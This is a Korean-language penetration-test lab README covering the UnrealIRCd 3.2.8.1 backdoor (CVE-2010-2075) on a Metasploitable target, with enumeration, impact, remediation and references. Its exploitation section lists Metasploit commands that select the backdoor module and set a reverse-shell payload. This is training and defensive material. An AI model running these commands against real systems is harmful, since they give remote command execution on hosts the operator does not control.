
Metasploitable3에서 UnrealIRCd 3.2.8.1 백도어(CVE-2010-2075)에 대한 통제된 침투 테스트 실습 보고서 및 수정 조치 단계
격리된 교육 환경에서 **UnrealIRCd 3.2.8.1 백도어(CVE-2010-2075)**를 식별, 악용 및 조치하는 데 초점을 맞춘 통제된 침투 테스트 프로젝트입니다.
고지 사항: 이 프로젝트는 의도적으로 취약하게 구성된 실습 환경을 대상으로 교육 및 승인된 보안 테스트 목적으로만 수행되었습니다. 승인되지 않은 시스템은 대상으로 삼지 않았습니다.
이 프로젝트는 취약한 UnrealIRCd 3.2.8.1 서비스를 대상으로 한 전체 취약점 평가 및 악용 워크플로우를 보여줍니다.
평가 항목은 다음과 같습니다:
| 항목 | 세부 정보 |
|---|---|
| 대상 | Metasploitable 실습 환경 |
| 대상 IP | 10.10.10.13 |
| 취약 서비스 | UnrealIRCd |
| 버전 | 3.2.8.1 |
| 프로토콜 | IRC |
| 포트 | 6667/TCP |
| 취약점 | UnrealIRCd 백도어 |
| CVE | CVE-2010-2075 |
| 심각도 | Critical |
NIST 국가 취약점 데이터베이스(NVD)에 따르면, 영향을 받는 UnrealIRCd 3.2.8.1 배포본에는 외부에서 삽입된 변조가 포함되어 있어 원격 공격자가 임의의 명령을 실행할 수 있었습니다.
이 평가의 주요 목표는 다음과 같습니다:
이 평가는 단순화된 침투 테스트 워크플로우를 따랐습니다:
Reconnaissance
↓
Service Enumeration
↓
Vulnerability Identification
↓
Exploitation
↓
Evidence Collection
↓
Impact Assessment
↓
Remediation
↓
Verification
첫 번째 단계는 대상 호스트에서 노출된 서비스를 식별하는 것이었습니다.
평가 결과 IRC 서비스가 다음 포트에서 수신 대기 중임을 확인했습니다:
TCP/6667
해당 서비스는 백도어 취약점의 영향을 받는 것으로 알려진 UnrealIRCd 3.2.8.1과 연관되어 있었습니다.

그림 1 — 포트 및 서비스 열거
TCP/6667의 발견은 IRC 서비스가 노출되어 추가 조사가 필요하다는 최초의 신호를 제공했습니다.
식별된 UnrealIRCd 버전은 CVE-2010-2075와 연관되어 있었습니다.
이 취약점은 단순한 일반적인 소프트웨어 버그가 아닙니다. 영향을 받는 아카이브에는 원격 명령 실행을 가능하게 하는 악의적인 변조/백도어가 포함되어 있었습니다. NVD는 이 문제를 DEBUG3_DOLOG_SYSTEM 매크로에 외부에서 삽입된 트로이 목마로 설명합니다.
Rapid7의 Metasploit 문서는 해당 모듈을 다음과 같이 식별합니다:
exploit/unix/irc/unreal_ircd_3281_backdoor
그리고 이를 영향을 받는 UnrealIRCd 3.2.8.1 아카이브에 존재하는 악성 백도어를 악용하는 것으로 설명합니다.
취약점은 Metasploit Framework를 사용하여 격리된 실습 환경에서 검증되었습니다.
예시 악용 워크플로우:
msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS 10.10.10.13
set PAYLOAD cmd/unix/reverse
run
이 단계의 목적은 노출된 서비스가 원격 명령 실행을 위해 악용될 수 있는지 확인하는 것이었습니다.
Rapid7은 이 Metasploit 모듈을 UnrealIRCd 3.2.8.1 백도어 전용으로 문서화하고 있습니다.

그림 2 — 통제된 악용 증거
해당 증거는 승인된 실습 대상을 대상으로 수행된 악용 단계를 보여줍니다.
백도어 악용에 성공하면 공격자는 영향을 받는 UnrealIRCd 프로세스의 보안 컨텍스트에서 원격으로 명령을 실행할 수 있게 됩니다.
획득되는 정확한 권한은 IRC 데몬이 실행 중인 계정에 따라 달라집니다.
잠재적 영향은 다음과 같습니다:
중요: 잠재적 영향은 나열된 모든 행위가 이 평가 중에 수행되었음을 의미하는 증거로 해석되어서는 안 됩니다.
UnrealIRCd 백도어에 대한 Nmap 문서는 이 취약점이 원격 시스템에서 임의의 명령을 실행하는 데 사용될 수 있음을 확인합니다.
취약한 UnrealIRCd 설치본은 프로덕션 환경에 노출된 채로 남아 있어서는 안 됩니다.
권장 조치 사항은 다음과 같습니다:
IRC가 필요하지 않은 경우:
sudo ufw deny 6667/tcp
서비스가 필요한 경우 광범위하게 노출하기보다는 신뢰할 수 있는 네트워크로 접근을 제한해야 합니다.
바람직한 방법은 네트워크 필터링에만 의존하기보다 취약한 소프트웨어를 제거하고 지원되는 신뢰할 수 있는 릴리스를 배포하는 것입니다.
적절한 보안 통제를 적용한 후 조치 단계를 문서화했습니다.

그림 3 — 조치/강화 증거
조치 증거는 교정 조치 적용 후 서비스 및/또는 방화벽 구성 상태를 보여주어야 합니다.
이 백도어는 원격 명령 실행을 허용하도록 설계되었으며 일반적인 IRC 사용자 제한과 무관하게 작동할 수 있으므로, 취약한 서비스의 노출은 심각한 보안 위험이 됩니다.
unrealircd-backdoor-pentest-report/
│
├── README.md
├── UnrealIRCD_Backdoor_PenTest_Report.pdf
│
└── images/
├── port_scan.png
├── exploit_evidence.png
└── remediation.png
| 증거 | 설명 |
|---|---|
port_scan.png | 노출된 IRC 서비스의 탐색 |
exploit_evidence.png | 통제된 악용 증거 |
remediation.png | 조치 후 보안/강화 증거 |
이 평가는 침투 테스트의 몇 가지 중요한 개념을 보여줍니다:
NIST 국가 취약점 데이터베이스 — CVE-2010-2075
CVE 세부 정보 및 취약점 설명.
Rapid7 취약점 데이터베이스 — UnrealIRCd 3.2.8.1 백도어 명령 실행
Metasploit 모듈 문서 및 기술 세부 정보.
Rapid7 Metasploit Framework — UnrealIRCd 백도어 모듈
공식 Metasploit 모듈 구현.
Nmap NSE 문서 — irc-unrealircd-backdoor
UnrealIRCd 백도어 탐지 문서.
이 저장소는 통제된 환경에서의 사이버 보안 교육, 승인된 침투 테스트, 보안 연구만을 위한 것입니다.
이 프로젝트에서 시연된 기술은 명시적 승인을 받은 시스템에 대해서만 사용해야 합니다.
소유하지 않았거나 테스트 권한이 없는 시스템에는 이러한 기술을 사용하지 마십시오.
| 도구 | 용도 |
|---|
| Nmap | 포트 스캐닝 및 서비스 열거 |
| Netcat | TCP 서비스 연결 테스트 |
| Metasploit Framework | 통제된 악용 |
| Linux CLI | 시스템 검증 및 강화 |
| UFW | 방화벽 구성 |
| Python | 보안/테스트 작업 보조 |
| 범주 | 평가 |
|---|
| 취약점 | UnrealIRCd 3.2.8.1 백도어 |
| CVE | CVE-2010-2075 |
| 공격 벡터 | 네트워크 |
| 인증 필요 여부 | 백도어 트리거에 인증 불필요 |
| 사용자 상호작용 | 불필요 |
| 영향 | 원격 명령 실행 |
| 심각도 | Critical |